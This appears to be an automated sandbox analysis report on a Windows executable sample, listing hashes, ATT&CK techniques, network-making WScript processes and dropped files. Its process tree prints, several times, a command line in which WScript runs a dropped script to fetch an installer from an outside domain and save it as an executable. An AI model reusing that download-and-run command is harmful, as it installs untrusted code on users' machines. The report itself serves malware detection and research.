6c0b027fba77e10b9861a1b26bba84603cd77bf3059d49f75e723fe99fb9d16b

Analysis

max time kernel
122s
max time network
122s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
23/05/2024, 09:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe
Size

184KB
MD5

6a6df11b28209dd4ff99e26bb9152d22
SHA1

43163388eaff6c55708352860e782022aee2cf63
SHA256

6c0b027fba77e10b9861a1b26bba84603cd77bf3059d49f75e723fe99fb9d16b
SHA512

ade201786c08a8083313017c989aa8107e414b00bb2e80ff01a5c033da28e6bad4cd6857ff3d3bac2dc74c0034b4c25bdda321c3b885ec590b91acb27041b238
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Q:/7BSH8zUB+nGESaaRvoB7FJNndnp

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1752	WScript.exe
8	1752	WScript.exe
10	1752	WScript.exe
12	2892	WScript.exe
13	2892	WScript.exe
15	2768	WScript.exe
16	2768	WScript.exe
18	1680	WScript.exe
19	1680	WScript.exe
21	1780	WScript.exe
22	1780	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2960 wrote to memory of 1752	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	28
PID 2960 wrote to memory of 1752	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	28
PID 2960 wrote to memory of 1752	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	28
PID 2960 wrote to memory of 1752	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	28
PID 2960 wrote to memory of 2892	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	30
PID 2960 wrote to memory of 2892	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	30
PID 2960 wrote to memory of 2892	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	30
PID 2960 wrote to memory of 2892	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	30
PID 2960 wrote to memory of 2768	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	32
PID 2960 wrote to memory of 2768	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	32
PID 2960 wrote to memory of 2768	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	32
PID 2960 wrote to memory of 2768	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	32
PID 2960 wrote to memory of 1680	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	34
PID 2960 wrote to memory of 1680	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	34
PID 2960 wrote to memory of 1680	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	34
PID 2960 wrote to memory of 1680	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	34
PID 2960 wrote to memory of 1780	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	36
PID 2960 wrote to memory of 1780	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	36
PID 2960 wrote to memory of 1780	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	36
PID 2960 wrote to memory of 1780	2960	6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\6a6df11b28209dd4ff99e26bb9152d22_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=sCGnUDfapb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:1752
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=sCGnUDfapb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:2892
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=sCGnUDfapb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:2768
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=sCGnUDfapb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:1680
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf227E.js" http://www.djapp.info/?domain=sCGnUDfapb.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf227E.exe
  2⤵
  - Blocklisted process makes network request
  PID:1780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
e4cacc9fa4adc8a6751aaf917c99e447

SHA1
d27c0b41d3fe6627c82ea3e6e762b1474f64ba51

SHA256
6ebb6b38a3cab01ca3d714f8df8b1d1dc0f159922fe9ae5e104dcd27c59eaf30

SHA512
fc104a463bf08270217f88841c8690dcb264abeebf8bd78dfda2dd2bd4fa85231dc7aede74e427483065ef3e6ef3f2c7e73c1c67dc274861da3421ea35927a80

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
19b617ee3820a4acffa37b4496a0e732

SHA1
c9df524d1002255301e0250feb6461520387eeb6

SHA256
1c807377e19251665bc2b6a069b716eb2b95d9edbe831ece98c1371813db10e1

SHA512
ede72248f58c2a805f2821220c684a2e95388fd2562bf86bfe294cf32d8d89e0042dd25781a05075e7464bb6d73a03920e0b3ab6387495ffa6f9f6b569ebe412

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8d6b1ea0edea2e7e6b8a9ed1337d9344

SHA1
02158ae2462ef5d1ccfc0362370f2c003d84ee8c

SHA256
a0b4f5591c9238e6ed3a1056665566ec391ec34f2e36e1a9a482bd6d0a5756b2

SHA512
309f9d83d50ee832454a93f5557b090f4c471840b4deef99f7d7b87ead30735a77a9e1e7db3890c96e4aef8e23f8d4297b7dcac5503e66dddda445d2f8974bfb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
e0c8e6205e70fe318d3bc3180f03687d

SHA1
f6d493fa6d0851bc6244ec84be1be7715aeed611

SHA256
5e5b8e9dc82bb0a7896c5ee9d028cd226d84ebaf53194e05c5d7210a2ec7bce1

SHA512
72b284de4552f4ef07e3a9c037d1419bb47cf7773c028b3b1457848f3f12cbee3b2a5a5e156b9146d6090f46725d8a81110b708e76f262008bb34721e40d9dc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm

Filesize
6KB

MD5
160ee86fe1908e348af2ad9a50ba73be

SHA1
3ed3dd786caa8422763599d2435b995f435bbf35

SHA256
36a5d40e8f2b95fe68d1d4a7ebbe8552671bcddc11b953de5e535911241ef04b

SHA512
939c9e36d56c85ffc995b23e4d353001589d61d02805f21a2a9766ecc5cce17cd5b86f13a9fe0d868d59ad0929e835312dd36091e2132e2a54d75b7d40304302

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm

Filesize
40KB

MD5
0372461b0d1cc3110493f86e9fe5a4ae

SHA1
0862251ef6fbb632442526057c3e10adca970620

SHA256
908c1024f37c06653ae77e74fa2e71559338558dfab3448cc5a2468baf66a56b

SHA512
4ed0a78d8a3493d7f3cbf3f292d49ebf8d20f4a83ebccdcbcb70c5864f3f26cc6a9f2eba58a0223e275ca1442926a0d3d1dab29afa171d3519c968a001865ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm

Filesize
6KB

MD5
ef20c816d5e4d4d772a7a4bf372515f7

SHA1
b502e04337c197a6ef5b132d0bef9010f9ca0cba

SHA256
dac8bc3e317d719a11000549529f5b708baac9fcc9633c060948575d716d7985

SHA512
8d6a76b88fb1f42600d0d9ae773f350bd01809d68459dfd429176029b62dfbbfcc3c24a1c924e21c59f72ff92c1bdc806af8b85f79f45cb9ca2a7ce7d4a376ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm

Filesize
6KB

MD5
89acd19ed4f341cf590f92e78735dfc1

SHA1
b0a84511b94bffb3b367e155d554fdc2415944a9

SHA256
380e41ef85bf2297c43bded1f352b196010597dd641a103ed3579c3b5c205dfb

SHA512
238fd9fd3633d841dbb18274a488020ad110a5c5dfd78609b8c25927bee5a0b04c41cfd51ed89583fa4564de738a0b37e39ea1421494606bab783d9fdb67c2b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab518A.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6A0A.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf227E.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0H12KEQ6.txt

Filesize
177B

MD5
2e401f86ee601de905d54e301c7d812b

SHA1
368a499b64b25405a033a8fd95fabca7e77c4b93

SHA256
effed22546bb0995d9ae567315027216af1ff66763e9631f3ed01632754f331f

SHA512
793c1af40cff82d1f49c971d8f4e7a0422fa81ad880da2514f4628fcc8ec353fb5e3179890519bab6cc1e304acddcd89936313f50f5d4ec0fb2196e5220615af

Download Submit